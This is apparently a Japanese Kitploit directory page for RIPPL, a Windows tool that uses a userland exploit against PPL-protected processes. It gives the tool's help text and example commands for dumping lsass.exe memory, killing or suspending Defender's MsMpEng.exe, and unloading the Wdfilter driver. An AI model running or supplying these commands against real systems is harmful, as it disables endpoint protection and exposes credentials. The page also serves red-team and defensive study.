Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/last-byte/rippl
特権昇格エクスプロイトポストエクスプロイトレッドチーミング
GitHublast-byte/rippl

RIPPL

RIPPL は、Windows 上の PPL プロセスを操作するためにユーザーモードのみのエクスプロイトを悪用するツールです

リポジトリを見る
7124年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

RIPPL

ドライバを使用せずにPPL保護プロセスを操作する

defender funny

このツールは、WindowsのPPL保護プロセスを操作するための__ユーザーランド__エクスプロイトを実装しています。この手法は、James Forshaw(別名@tiraniddo)とClément Labro(別名@itm4n)によって、以下のブログ記事で最初に議論されました。

  • James Forshaw氏のブログ記事: Windows Exploitation Tricks
  • Clément Labro氏のブログ記事 その1: Do You Really Know About LSA Protection (RunAsPPL)?
  • Clément Labro氏のブログ記事 その2: Bypassing LSA Protection in Userland

使用方法

警告: 安全なバージョンのバイナリは__決して__何も出力しません。すべての文字列とprint関数は条件付きコンパイルマクロを使用して取り除かれているためです。

引数なしで実行ファイルを実行するだけで、詳細なヘルプ/使用方法が表示されます(OPSECマクロを定義せずにコンパイルされたバイナリでのみ有効です)。

root@kitploit:~
c:\Temp>.\rippl.exe
  _____  _____ _____  _____  _
 |  __ \|_   _|  __ \|  __ \| |
 | |__) | | | | |__) | |__) | |      version 0.1
 |  _  /  | | |  ___/|  ___/| |      by @last0x00
 | | \ \ _| |_| |    | |    | |____  forked by itm4n's PPLDump
 |_|  \_\_____|_|    |_|    |______|

Description:
  Manipulate Protected Process Light (PPL) processes with a *userland* exploit

Usage:
  rippl.exe (-D|-K|-S|-R|-L|-X|-W|-Z|-T|-U) [-v] [-d] [-f] (PROC_NAME|PID) [DUMP_FILE|DRIVER_NAME]
  () -> mandatory arguments
  [] -> optional arguments

Operation modes (choose ONLY one):
  -D -> Dump the given process
  -K -> Kill the given process
  -S -> Suspend the given process
  -R -> Resume the previously suspended process
  -L -> Leak a PROCESS_ALL_ACCESS handle to the given process (not yet implemented)
  -X -> Kill the given process by assigning it to a job object and terminating the object
  -W -> Freeze the process by assigning it to a job object and severely constraining its CPU resources
  -Z -> Kill the given process by injecting a thread into it which calls exit(0)
  -T -> Sandbox the process by disabling all of its token's privileges and lowering integrity to untrusted
  -U -> Unload the provided driver

Arguments:
  PROC_NAME   -> The name of the process to interact with
  PID         -> The ID of the process to interact with
  DUMP_FILE   -> The path of the output dump file - valid ONLY with the -D option
  DRIVER_NAME -> The name of the driver to unload - valid ONLY with the -U option

Options:
  -d -> (Debug) Enable debug mode
  -f -> (Force) Bypass DefineDosDevice error check

Examples:
  rippl.exe -K MsMpEng.exe
  rippl.exe -S MsMpEng.exe
  rippl.exe -R MsMpEng.exe
  rippl.exe -D -f lsass.exe lsass.dmp
  rippl.exe -D -d -f 720 out.dmp
  rippl.exe -U Wdfilter
ツールをダウンロード